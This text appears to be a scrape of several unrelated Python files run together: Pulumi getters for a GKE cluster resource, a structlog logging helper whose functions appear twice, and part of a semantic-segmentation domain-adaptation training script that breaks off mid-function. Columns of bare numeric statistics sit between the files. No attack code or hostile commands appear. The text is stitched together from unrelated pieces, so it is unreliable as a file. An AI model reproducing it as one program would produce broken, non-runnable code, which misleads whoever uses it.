@pulumi.getter(name="loggingService")
def logging_service(self) -> pulumi.Output[str]:
"""
The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
"""
return pulumi.get(self, "logging_service")
@property
@pulumi.getter(name="maintenancePolicy")
def maintenance_policy(self) -> pulumi.Output[Optional['outputs.ClusterMaintenancePolicy']]:
"""
The maintenance policy to use for the cluster. Structure is
documented below.
"""
return pulumi.get(self, "maintenance_policy")
@property
@pulumi.getter(name="masterAuth")
def master_auth(self) -> pulumi.Output['outputs.ClusterMasterAuth']:
"""
The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
"""
return pulumi.get(self, "master_auth")
@property
@pulumi.getter(name="masterAuthorizedNetworksConfig")
def master_authorized_networks_config(self) -> pulumi.Output[Optional['outputs.ClusterMasterAuthorizedNetworksConfig']]:
"""
The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
"""
return pulumi.get(self, "master_authorized_networks_config")
@property
@pulumi.getter(name="masterVersion")
def master_version(self) -> pulumi.Output[str]:
"""
The current version of the master in the cluster. This may
be different than the `min_master_version` set in the config if the master
has been updated by GKE.
"""
return pulumi.get(self, "master_version")
@property
@pulumi.getter(name="minMasterVersion")
def min_master_version(self) -> pulumi.Output[Optional[str]]:
"""
The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
"""
return pulumi.get(self, "min_master_version")
@property
@pulumi.getter(name="monitoringConfig")
def monitoring_config(self) -> pulumi.Output['outputs.ClusterMonitoringConfig']:
"""
Monitoring configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "monitoring_config")
@property
@pulumi.getter(name="monitoringService")
def monitoring_service(self) -> pulumi.Output[str]:
"""
The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
"""
return pulumi.get(self, "monitoring_service")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the cluster, unique within the project and
location.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def network(self) -> pulumi.Output[Optional[str]]:
"""
The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
"""
return pulumi.get(self, "network")
@property
@pulumi.getter(name="networkPolicy")
def network_policy(self) -> pulumi.Output['outputs.ClusterNetworkPolicy']:
"""
Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
"""
return pulumi.get(self, "network_policy")
@property
@pulumi.getter(name="networkingMode")
def networking_mode(self) -> pulumi.Output[str]:
"""
Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
"""
return pulumi.get(self, "networking_mode")
@property
@pulumi.getter(name="nodeConfig")
def node_config(self) -> pulumi.Output['outputs.ClusterNodeConfig']:
"""
Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
"""
return pulumi.get(self, "node_config")
@property
@pulumi.getter(name="nodeLocations")
def node_locations(self) -> pulumi.Output[Sequence[str]]:
"""
The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
"""
return pulumi.get(self, "node_locations")
@property
@pulumi.getter(name="nodePools")
def node_pools(self) -> pulumi.Output[Sequence['outputs.ClusterNodePool']]:
"""
List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
"""
return pulumi.get(self, "node_pools")
@property
@pulumi.getter(name="nodeVersion")
def node_version(self) -> pulumi.Output[str]:
"""
The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
"""
return pulumi.get(self, "node_version")
@property
@pulumi.getter(name="notificationConfig")
def notification_config(self) -> pulumi.Output['outputs.ClusterNotificationConfig']:
"""
Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
"""
return pulumi.get(self, "notification_config")
@property
@pulumi.getter
def operation(self) -> pulumi.Output[str]:
return pulumi.get(self, "operation")
@property
@pulumi.getter(name="podSecurityPolicyConfig")
def pod_security_policy_config(self) -> pulumi.Output[Optional['outputs.ClusterPodSecurityPolicyConfig']]:
"""
) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
"""
return pulumi.get(self, "pod_security_policy_config")
@property
@pulumi.getter(name="privateClusterConfig")
def private_cluster_config(self) -> pulumi.Output['outputs.ClusterPrivateClusterConfig']:
"""
Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
"""
return pulumi.get(self, "private_cluster_config")
@property
@pulumi.getter(name="privateIpv6GoogleAccess")
def private_ipv6_google_access(self) -> pulumi.Output[str]:
"""
The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
"""
return pulumi.get(self, "private_ipv6_google_access")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="releaseChannel")
def release_channel(self) -> pulumi.Output['outputs.ClusterReleaseChannel']:
"""
Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
"""
return pulumi.get(self, "release_channel")
@property
@pulumi.getter(name="removeDefaultNodePool")
def remove_default_node_pool(self) -> pulumi.Output[Optional[bool]]:
"""
If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
"""
return pulumi.get(self, "remove_default_node_pool")
@property
@pulumi.getter(name="resourceLabels")
def resource_labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
"""
return pulumi.get(self, "resource_labels")
@property
@pulumi.getter(name="resourceUsageExportConfig")
def resource_usage_export_config(self) -> pulumi.Output[Optional['outputs.ClusterResourceUsageExportConfig']]:
"""
Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
"""
return pulumi.get(self, "resource_usage_export_config")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The server-defined URL for the resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter(name="servicesIpv4Cidr")
def services_ipv4_cidr(self) -> pulumi.Output[str]:
"""
The IP address range of the Kubernetes services in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`). Service addresses are typically put in the last
`/16` from the container CIDR.
"""
return pulumi.get(self, "services_ipv4_cidr")
@property
@pulumi.getter
def subnetwork(self) -> pulumi.Output[str]:
"""
The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
"""
return pulumi.get(self, "subnetwork")
@property
@pulumi.getter(name="tpuIpv4CidrBlock")
def tpu_ipv4_cidr_block(self) -> pulumi.Output[str]:
"""
The IP address range of the Cloud TPUs in this cluster, in
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`).
"""
return pulumi.get(self, "tpu_ipv4_cidr_block")
@property
@pulumi.getter(name="verticalPodAutoscaling")
def vertical_pod_autoscaling(self) -> pulumi.Output[Optional['outputs.ClusterVerticalPodAutoscaling']]:
"""
Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
"""
return pulumi.get(self, "vertical_pod_autoscaling")
@property
@pulumi.getter(name="workloadIdentityConfig")
def workload_identity_config(self) -> pulumi.Output['outputs.ClusterWorkloadIdentityConfig']:
"""
Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
return pulumi.get(self, "workload_identity_config")
| 59.733731
| 461
| 0.695944
| 25,817
| 220,298
| 5.767711
| 0.027075
| 0.056069
| 0.063289
| 0.021692
| 0.980753
| 0.976132
| 0.969457
| 0.968201
| 0.966657
| 0.953548
| 0
| 0.002403
| 0.215939
| 220,298
| 3,687
| 462
| 59.749932
| 0.85968
| 0.485261
| 0
| 0.90688
| 1
| 0
| 0.186991
| 0.114401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170819
| false
| 0.000593
| 0.004152
| 0.001186
| 0.278173
| 0.008897
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4cdba5963a08b3f68d730d6baf1bea38cf7138df
| 2,424
|
py
|
Python
|
Helpseeker_nbdev/logging.py
|
vlaukhin/Helpseeker_nbdev
|
fbb2dd62a162340d3fd3e110721e7d6445011435
|
[
"Apache-2.0"
] | null | null | null |
Helpseeker_nbdev/logging.py
|
vlaukhin/Helpseeker_nbdev
|
fbb2dd62a162340d3fd3e110721e7d6445011435
|
[
"Apache-2.0"
] | null | null | null |
Helpseeker_nbdev/logging.py
|
vlaukhin/Helpseeker_nbdev
|
fbb2dd62a162340d3fd3e110721e7d6445011435
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: logging.ipynb (unless otherwise specified).
__all__ = ['add_timestamp', 'logging_setup', 'add_timestamp', 'logging_setup']
# Comes from StatsCanadaCore-checkpoint.ipynb, cell
import datetime
import logging
import sys
from structlog import wrap_logger
from structlog.processors import JSONRenderer
from structlog.stdlib import filter_by_level
def add_timestamp(_, __, event_dict):
"""
Add timestamp to a structlog entry
Args:
event_dict: structlog event_dict
Returns:
event_dict: modified structlog event_dict, now includes a timestamp
"""
event_dict["timestamp"] = datetime.datetime.utcnow()
return event_dict
def logging_setup(log_level='INFO'):
"""
Set up standard structlog logger
Args:
log_level: string, defined the logging level. Can be: 'INFO', 'WARNING'
Returns:
logger: instantiated logger
"""
# logging setup. Import log level from config.json
logging.basicConfig(stream=sys.stdout,format="%(message)s", level=log_level)
logger = wrap_logger(
logging.getLogger(__name__),
processors=[
filter_by_level,
add_timestamp,
JSONRenderer(indent=1, sort_keys=True)
]
)
return logger
# Comes from StatsCanadaCore.ipynb, cell
import datetime
import logging
import sys
from structlog import wrap_logger
from structlog.processors import JSONRenderer
from structlog.stdlib import filter_by_level
def add_timestamp(_, __, event_dict):
"""
Add timestamp to a structlog entry
Args:
event_dict: structlog event_dict
Returns:
event_dict: modified structlog event_dict, now includes a timestamp
"""
event_dict["timestamp"] = datetime.datetime.utcnow()
return event_dict
def logging_setup(log_level='INFO'):
"""
Set up standard structlog logger
Args:
log_level: string, defined the logging level. Can be: 'INFO', 'WARNING'
Returns:
logger: instantiated logger
"""
# logging setup. Import log level from config.json
logging.basicConfig(stream=sys.stdout,format="%(message)s", level=log_level)
logger = wrap_logger(
logging.getLogger(__name__),
processors=[
filter_by_level,
add_timestamp,
JSONRenderer(indent=1, sort_keys=True)
]
)
return logger
| 26.064516
| 87
| 0.685231
| 284
| 2,424
| 5.630282
| 0.25
| 0.078799
| 0.03252
| 0.030019
| 0.889306
| 0.889306
| 0.889306
| 0.889306
| 0.889306
| 0.889306
| 0
| 0.001075
| 0.232673
| 2,424
| 93
| 88
| 26.064516
| 0.858602
| 0.377475
| 0
| 0.878049
| 1
| 0
| 0.072411
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.292683
| 0
| 0.487805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4cf4d5b1add65853eb533eeb939c1fb1a710c0bc
| 78,189
|
py
|
Python
|
advent/domain_adaptation/train_UDA.py
|
gritYCDA/boundaryOCDA
|
d93f2d4ad1f41d7ec19ba2a2fc7e98ecce914ccb
|
[
"Apache-2.0"
] | null | null | null |
advent/domain_adaptation/train_UDA.py
|
gritYCDA/boundaryOCDA
|
d93f2d4ad1f41d7ec19ba2a2fc7e98ecce914ccb
|
[
"Apache-2.0"
] | null | null | null |
advent/domain_adaptation/train_UDA.py
|
gritYCDA/boundaryOCDA
|
d93f2d4ad1f41d7ec19ba2a2fc7e98ecce914ccb
|
[
"Apache-2.0"
] | null | null | null |
# --------------------------------------------------------
# Domain adpatation training
# Copyright (c) 2019 valeo.ai
#
# Written by Tuan-Hung Vu
# --------------------------------------------------------
import os
import sys
from pathlib import Path
import os.path as osp
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import torch.optim as optim
from tensorboardX import SummaryWriter
from torch import nn
from torchvision.utils import make_grid, save_image
from tqdm import tqdm
from advent.model.discriminator import get_fc_discriminator
from advent.utils.func import adjust_learning_rate, adjust_learning_rate_discriminator
from advent.utils.func import loss_calc, bce_loss, mse_loss, boundary_loss_func, reg_loss_calc_ign
from advent.utils.loss import entropy_loss
from advent.utils.func import prob_2_entropy
from advent.utils.viz_segmask import colorize_mask
import matplotlib.pyplot as plt
from copy import deepcopy
import random
###########################################################################################
# TODO: Source Only for VGG
def train_vgg(model, trainloader, targetloader, cfg):
''' UDA training with advent
'''
# Create the model and start the training.
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
# reset optimizers
optimizer.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name, _ = batch
mid_feature_src, pred_src_main = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
loss.backward()
optimizer.step()
current_losses = {'loss_seg_src_main': loss_seg_src_main}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
# TODO: advent resnet
def train_advent(model, trainloader, targetloader, cfg):
''' UDA training with advent
'''
# Create the model and start the training.
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# DISCRIMINATOR NETWORK
# feature-level
d_aux = get_fc_discriminator(num_classes=num_classes)
d_aux.train()
d_aux.to(device)
# seg maps, i.e. output, level
d_main = get_fc_discriminator(num_classes=num_classes)
d_main.train()
d_main.to(device)
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# discriminators' optimizers
optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
# labels for adversarial training
source_label = 0
target_label = 1
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
# reset optimizers
optimizer.zero_grad()
optimizer_d_aux.zero_grad()
optimizer_d_main.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
for param in d_aux.parameters():
param.requires_grad = False
for param in d_main.parameters():
param.requires_grad = False
# train on source
_, batch = trainloader_iter.__next__()
images_source, labels, _, _ = batch
pred_src_aux, pred_src_main = model(images_source.cuda(device))
if cfg.TRAIN.MULTI_LEVEL:
pred_src_aux = interp(pred_src_aux)
loss_seg_src_aux = loss_calc(pred_src_aux, labels, device)
else:
loss_seg_src_aux = 0
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
+ cfg.TRAIN.LAMBDA_SEG_AUX * loss_seg_src_aux)
loss.backward()
# adversarial training ot fool the discriminator
_, batch = targetloader_iter.__next__()
images, _, _, _ = batch
pred_trg_aux, pred_trg_main = model(images.cuda(device))
if cfg.TRAIN.MULTI_LEVEL:
pred_trg_aux = interp_target(pred_trg_aux)
d_out_aux = d_aux(prob_2_entropy(F.softmax(pred_trg_aux)))
loss_adv_trg_aux = bce_loss(d_out_aux, source_label)
else:
loss_adv_trg_aux = 0
pred_trg_main = interp_target(pred_trg_main)
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
loss_adv_trg_main = bce_loss(d_out_main, source_label)
loss = (cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
+ cfg.TRAIN.LAMBDA_ADV_AUX * loss_adv_trg_aux)
loss = loss
loss.backward()
# Train discriminator networks
# enable training mode on discriminator networks
for param in d_aux.parameters():
param.requires_grad = True
for param in d_main.parameters():
param.requires_grad = True
# train with source
if cfg.TRAIN.MULTI_LEVEL:
pred_src_aux = pred_src_aux.detach()
d_out_aux = d_aux(prob_2_entropy(F.softmax(pred_src_aux)))
loss_d_aux = bce_loss(d_out_aux, source_label)
loss_d_aux = loss_d_aux / 2
loss_d_aux.backward()
pred_src_main = pred_src_main.detach()
d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
loss_d_main = bce_loss(d_out_main, source_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
# train with target
if cfg.TRAIN.MULTI_LEVEL:
pred_trg_aux = pred_trg_aux.detach()
d_out_aux = d_aux(prob_2_entropy(F.softmax(pred_trg_aux)))
loss_d_aux = bce_loss(d_out_aux, target_label)
loss_d_aux = loss_d_aux / 2
loss_d_aux.backward()
else:
loss_d_aux = 0
pred_trg_main = pred_trg_main.detach()
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
loss_d_main = bce_loss(d_out_main, target_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
optimizer.step()
if cfg.TRAIN.MULTI_LEVEL:
optimizer_d_aux.step()
optimizer_d_main.step()
current_losses = {'loss_seg_src_aux': loss_seg_src_aux,
'loss_seg_src_main': loss_seg_src_main,
'loss_adv_trg_aux': loss_adv_trg_aux,
'loss_adv_trg_main': loss_adv_trg_main,
'loss_d_aux': loss_d_aux,
'loss_d_main': loss_d_main}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(d_aux.state_dict(), snapshot_dir / f'model_{i_iter}_D_aux.pth')
torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T')
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
# TODO: advent + VGG backbone baseline
def train_advent_vgg(model, trainloader, targetloader, cfg):
'''
UDA training with advent
'''
# Create the model and start the training.
adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# DISCRIMINATOR NETWORK
# feature-level
# d_aux = get_fc_discriminator(num_classes=512, ndf=128)
# d_aux.train()
# d_aux.to(device)
# seg maps, i.e. output, level
d_main = get_fc_discriminator(num_classes=num_classes)
d_main.train()
d_main.to(device)
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# discriminators' optimizers
# optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
# betas=(0.9, 0.99))
optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
betas=(0.9, 0.99))
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
# labels for adversarial training
source_label = 0
target_label = 1
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
criterion_loss = mse_loss if cfg.GAN == 'lsgan' else bce_loss
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
# reset optimizers
optimizer.zero_grad()
# optimizer_d_aux.zero_grad()
optimizer_d_main.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
# UDA Training
# only train segnet. Don't accumulate grads in disciminators
for param in d_main.parameters():
param.requires_grad = False
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name, _ = batch
mid_feature_src, pred_src_main = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
loss.backward()
###################################
# train on gan generator for Seg #
###################################
_, batch = targetloader_iter.__next__()
images, _, _, _ = batch
mid_feature_tgt, pred_trg_main = model(images.cuda(device))
pred_trg_main = interp_target(pred_trg_main)
if adaptseg_on:
d_out_main = d_main(F.softmax(pred_trg_main))
else:
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
loss_adv_trg_main = criterion_loss(d_out_main, source_label)
loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
loss.backward()
for param in d_main.parameters():
param.requires_grad = True
##################################
# train on gan discrimin for Seg #
##################################
pred_src_main = pred_src_main.detach()
if adaptseg_on:
d_out_main = d_main(F.softmax(pred_src_main))
else:
d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
loss_d_main = criterion_loss(d_out_main, source_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
pred_trg_main = pred_trg_main.detach()
if adaptseg_on:
d_out_main = d_main(F.softmax(pred_trg_main))
else:
d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
loss_d_main = criterion_loss(d_out_main, target_label)
loss_d_main = loss_d_main / 2
loss_d_main.backward()
optimizer.step()
optimizer_d_main.step()
current_losses = {'loss_seg_src_main': loss_seg_src_main,
'loss_adv_trg_main': loss_adv_trg_main,
'loss_d_main': loss_d_main}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T')
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
###########################################################################################
# TODO: Source Only for boundary VGG
def train_Boundary_vgg(model, trainloader, targetloader, cfg):
''' UDA training with advent
'''
# Create the model and start the training.
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
